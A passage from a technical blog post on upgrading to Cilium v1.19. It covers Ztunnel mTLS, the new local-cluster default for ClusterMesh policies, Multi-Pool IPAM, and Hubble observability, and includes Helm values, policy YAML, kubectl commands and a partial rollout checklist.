&lt;h3&gt;
  
  
  3.1 What is different from IPsec/WireGuard?
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;IPsec/WireGuard (node-to-node)&lt;/th&gt;
&lt;th&gt;Ztunnel (workload-to-workload)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Scope&lt;/td&gt;
&lt;td&gt;Node ↔ Node (L3/L4)&lt;/td&gt;
&lt;td&gt;Workload ↔ Workload (L4 / mTLS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auth unit&lt;/td&gt;
&lt;td&gt;Node ID (Cilium identity)&lt;/td&gt;
&lt;td&gt;SPIFFE SVID (workload ID)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Key management&lt;/td&gt;
&lt;td&gt;IPsec SA / WG peer key&lt;/td&gt;
&lt;td&gt;SPIRE-compatible SDS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sidecars required&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No (ztunnel runs as a node DaemonSet)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Granularity&lt;/td&gt;
&lt;td&gt;Cluster-wide&lt;/td&gt;
&lt;td&gt;Per-namespace enrollment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mesh interop&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Works with Istio Ambient L4 or Cilium Ztunnel&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3.2 Enabling — namespace-scoped enrollment
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml — Ztunnel beta&lt;/span&gt;
&lt;span class="c1"&gt;# WARNING: Beta — recommend 4 weeks of staging validation before production&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ztunnel&lt;/span&gt;
  &lt;span class="na"&gt;ztunnel&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                       &lt;span class="c1"&gt;# v1.19 new beta gate&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;repository&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;quay.io/cilium/ztunnel&lt;/span&gt;
      &lt;span class="na"&gt;tag&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1.19.4&lt;/span&gt;
    &lt;span class="na"&gt;spire&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                     &lt;span class="c1"&gt;# SPIFFE SVID issuance — requires SPIRE server&lt;/span&gt;
      &lt;span class="na"&gt;serverAddress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spire-server.spire-system:8081&lt;/span&gt;
      &lt;span class="na"&gt;trustDomain&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster.local&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Enroll a namespace into Ztunnel&lt;/span&gt;
kubectl label namespace payments cilium.io/ztunnel-enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true
&lt;/span&gt;kubectl rollout restart &lt;span class="nt"&gt;-n&lt;/span&gt; payments deploy

&lt;span class="c"&gt;# Verify enrollment&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ztunnel
&lt;span class="c"&gt;# NAME            READY   STATUS    AGE&lt;/span&gt;
&lt;span class="c"&gt;# ztunnel-abc12   1/1     Running   1m&lt;/span&gt;
&lt;span class="c"&gt;# ztunnel-def34   1/1     Running   1m&lt;/span&gt;

&lt;span class="c"&gt;# Verify enrolled-workload mTLS&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; payments &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; api-pod &lt;span class="nt"&gt;--&lt;/span&gt; curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://db:5432
&lt;span class="c"&gt;# * SSL connection using TLSv1.3 / TLS_AES_128_GCM_SHA256&lt;/span&gt;
&lt;span class="c"&gt;# * Server certificate: spiffe://cluster.local/ns/payments/sa/db&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. ClusterMesh policy-default-local-cluster — default change blocks incidents
&lt;/h2&gt;

&lt;p&gt;The quietest but most impactful change in v1.19. When a NetworkPolicy selector did not specify a cluster, v1.18 matched &lt;strong&gt;the entire mesh&lt;/strong&gt;. So if one cluster wrote &lt;code&gt;allow from app=frontend&lt;/code&gt;, workloads in another cluster labeled &lt;code&gt;app=frontend&lt;/code&gt; were also implicitly allowed. Even when operators meant "only inside my cluster," the policy quietly fanned out through the mesh.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 The accidental cross-cluster exposure pattern
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Pre-v1.19: unintentionally fanned out across the mesh&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumNetworkPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-allow-frontend&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;endpointSelector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
  &lt;span class="na"&gt;ingress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;fromEndpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;frontend&lt;/span&gt;    &lt;span class="c1"&gt;# WARNING: in v1.18 this matched app=frontend across the entire mesh&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 New default — local cluster only
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# v1.19 implicitly adds io.cilium.k8s.policy.cluster=&amp;lt;local&amp;gt;&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumNetworkPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-allow-frontend&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;endpointSelector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
  &lt;span class="na"&gt;ingress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;fromEndpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;frontend&lt;/span&gt;    &lt;span class="c1"&gt;# v1.19 narrows to the local cluster&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Explicit opt-in for mesh-wide matching&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumNetworkPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-allow-frontend-mesh&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;endpointSelector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
  &lt;span class="na"&gt;ingress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;fromEndpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;frontend&lt;/span&gt;
            &lt;span class="na"&gt;io.cilium.k8s.policy.cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster-east&lt;/span&gt;   &lt;span class="c1"&gt;# explicit match&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Upgrade action — audit existing mesh policies first
&lt;/h3&gt;

&lt;p&gt;Upgrading to v1.19 &lt;strong&gt;may suddenly narrow policies that implicitly traversed the mesh, breaking communication.&lt;/strong&gt; The maintainers recommend the following procedure in the upgrade guide:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 1: Find CiliumNetworkPolicy rules that don't specify the cluster label&lt;/span&gt;
kubectl get ciliumnetworkpolicy &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.items[] | select(.spec.ingress // [] | .[].fromEndpoints // [] | .[].matchLabels | has("io.cilium.k8s.policy.cluster") | not) | .metadata.namespace + "/" + .metadata.name'&lt;/span&gt;

&lt;span class="c"&gt;# Step 2: Ask each policy owner whether the intent was mesh or local&lt;/span&gt;
&lt;span class="c"&gt;# Step 3: For mesh intent, PR explicit cluster labels&lt;/span&gt;
&lt;span class="c"&gt;# Step 4: Upgrade to v1.19 — missing mesh policies will sever communication immediately&lt;/span&gt;
helm upgrade cilium cilium/cilium &lt;span class="nt"&gt;--version&lt;/span&gt; 1.19.4 &lt;span class="nt"&gt;--namespace&lt;/span&gt; kube-system &lt;span class="nt"&gt;--reuse-values&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  5. Multi-Pool IPAM Stable — works with IPsec and direct routing
&lt;/h2&gt;

&lt;p&gt;Multi-Pool IPAM was introduced as Beta in v1.16, opening operational autonomy to allocate different CIDRs to different workloads in the same cluster. But up to v1.18 it had no stability guarantees on IPsec or direct-routing environments, which limited production use. v1.19 &lt;strong&gt;graduates it to Stable&lt;/strong&gt;, and both environments are officially supported.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 CiliumPodIPPool example
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Payments workload pool — non-overlapping CIDR with corporate VPC&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumPodIPPool&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments-pool&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;ipv4&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cidrs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;10.20.0.0/16&lt;/span&gt;
    &lt;span class="na"&gt;maskSize&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;24&lt;/span&gt;
  &lt;span class="na"&gt;ipv6&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;cidrs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;fd00:payments::/56&lt;/span&gt;
    &lt;span class="na"&gt;maskSize&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;64&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Pod chooses pool via annotation&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-server&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;ipam.cilium.io/ip-pool&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;payments-pool&lt;/span&gt;   &lt;span class="c1"&gt;# v1.19 Stable&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
      &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api:1.0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5.2 IPsec strict mode + Multi-Pool combo — set strict CIDR wide enough
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# When combining the two, the strict CIDR must cover every pool&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ipsec&lt;/span&gt;
  &lt;span class="na"&gt;strictMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;cidr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.0/8"&lt;/span&gt;    &lt;span class="c1"&gt;# WARNING: must encompass all CiliumPodIPPool CIDRs&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. Hubble drop event policy tagging, encrypted-flow filters, Trace IP Options
&lt;/h2&gt;

&lt;p&gt;The three observability additions in v1.19 cut debugging time directly.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Drop events automatically carry the denying policy name
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# v1.18: drop reason only — "which policy denied?" needs manual correlation&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--verdict&lt;/span&gt; DROPPED &lt;span class="nt"&gt;--since&lt;/span&gt; 5m
&lt;span class="c"&gt;# Aug 12 12:34:56 default/api-1234 :: default/db-5678 DROPPED (Policy denied)&lt;/span&gt;

&lt;span class="c"&gt;# v1.19: policy name and namespace attached to the verdict label&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--verdict&lt;/span&gt; DROPPED &lt;span class="nt"&gt;--since&lt;/span&gt; 5m &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="s1"&gt;'.flow.dropReasonDesc'&lt;/span&gt;
&lt;span class="c"&gt;# {&lt;/span&gt;
&lt;span class="c"&gt;#   "reason": "PolicyDenied",&lt;/span&gt;
&lt;span class="c"&gt;#   "policy_name": "default-deny-egress",&lt;/span&gt;
&lt;span class="c"&gt;#   "policy_namespace": "production",&lt;/span&gt;
&lt;span class="c"&gt;#   "policy_kind": "CiliumNetworkPolicy"&lt;/span&gt;
&lt;span class="c"&gt;# }&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6.2 Encrypted vs unencrypted flow filtering
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Show only unencrypted traffic — essential before enabling strict mode&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--unencrypted&lt;/span&gt; &lt;span class="nt"&gt;--since&lt;/span&gt; 1h | &lt;span class="nb"&gt;tee &lt;/span&gt;unencrypted.log

&lt;span class="c"&gt;# Show only encrypted traffic for analysis&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--encrypted&lt;/span&gt; &lt;span class="nt"&gt;--since&lt;/span&gt; 1h &lt;span class="nt"&gt;--output&lt;/span&gt; json &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; encrypted.jsonl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  6.3 Trace IP Options — mark specific packets for path tracing
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Mark packets with IPv4 options to trace their datapath hops&lt;/span&gt;
&lt;span class="c"&gt;# WARNING: some NICs/switches drop packets with IPv4 options — validate in test env&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system patch cm cilium-config &lt;span class="nt"&gt;--type&lt;/span&gt; merge &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="s1"&gt;'{"data":{"trace-ip-options":"true"}}'&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system rollout restart ds/cilium

&lt;span class="c"&gt;# Show per-hop trace for marked packets&lt;/span&gt;
hubble observe &lt;span class="nt"&gt;--ip-option-marked&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Network Policy ICMPv4 Destination Unreachable — ending the dumb 30-second retry
&lt;/h2&gt;

&lt;p&gt;In v1.18 and earlier, a Network Policy denial silently dropped the packet and the client retried TCP for about 30 seconds. v1.19 adds an option to return &lt;strong&gt;ICMPv4 Destination Unreachable (code 13 — Communication Administratively Prohibited)&lt;/strong&gt;. The client OS immediately maps that to &lt;code&gt;connection refused&lt;/code&gt; and debugging latency collapses.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml&lt;/span&gt;
&lt;span class="c1"&gt;# WARNING: external firewalls blocking ICMPv4 will swallow the response&lt;/span&gt;
&lt;span class="na"&gt;policyEnforcementMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;policyAuditMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;span class="na"&gt;icmpUnreachable&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;       &lt;span class="c1"&gt;# v1.19 new — friendly deny response&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify the friendly deny&lt;/span&gt;
kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; test-pod &lt;span class="nt"&gt;--&lt;/span&gt; curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://api:8080
&lt;span class="c"&gt;# * connect to api port 8080 failed: Connection refused   ← terminates immediately, no 30s wait&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  8. Visualization — how v1.19's six axes combine in the deployment flow
&lt;/h2&gt;

&lt;p&gt;The diagram below shows how the six axes of v1.19 combine when a new workload is deployed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart LR
    A[New Pod deploy] --&amp;gt; B{Which IP Pool?}
    B --&amp;gt;|payments-pool| C[Multi-Pool IPAM Stable&amp;lt;br/&amp;gt;allocate from 10.20.0.0/16]
    C --&amp;gt; D{Inside strict mode CIDR?}
    D --&amp;gt;|Yes| E[IPsec/WireGuard&amp;lt;br/&amp;gt;strict encryption enforced]
    D --&amp;gt;|No| F[Plaintext blocked → cut traffic]
    E --&amp;gt; G{Namespace enrolled in Ztunnel?}
    G --&amp;gt;|Yes| H[Ztunnel mTLS Beta&amp;lt;br/&amp;gt;SPIFFE SVID issued]
    G --&amp;gt;|No| I[L4 only]
    H --&amp;gt; J[Evaluate CiliumNetworkPolicy]
    I --&amp;gt; J
    J --&amp;gt;|allow| K[Hubble flow OK]
    J --&amp;gt;|deny| L[ICMPv4 friendly deny&amp;lt;br/&amp;gt;Hubble drop + policy name tagged]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  9. ManoIT internal checklist — 3 clusters × 9 steps
&lt;/h2&gt;

&lt;p&gt;The checklist below extends the seven sections above into an operations procedure. ManoIT runs three clusters (prod / stage / dev) and validates alpha/beta features in staging for 2 weeks and prod for 1 week before progressive rollout.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Completion criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory Cilium · Hubble · ClusterMesh API server versions across 3 clusters&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;PR listing instances below v1.19&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Audit CiliumNetworkPolicy — extract rules with no cluster label&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;jq script output + contact each policy owner&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Add explicit cluster labels to policies whose intent was mesh-wide&lt;/td&gt;
&lt;td&gt;Each service owner&lt;/td&gt;
&lt;td&gt;All policy PRs merged&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Upgrade dev to v1.19.4 (strict OFF, Ztunnel OFF)&lt;/td&gt;
&lt;td&gt;Platform team&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cilium version&lt;/code&gt; = 1.19.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Validate mesh-policy regression in dev — zero unintended communication breaks&lt;/td&gt;
&lt;td&gt;Each service owner&lt;/td&gt;
&lt;td&gt;Hubble drop counter delta report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Enable Multi-Pool IPAM Stable in staging with v1.19.4&lt;/td&gt;
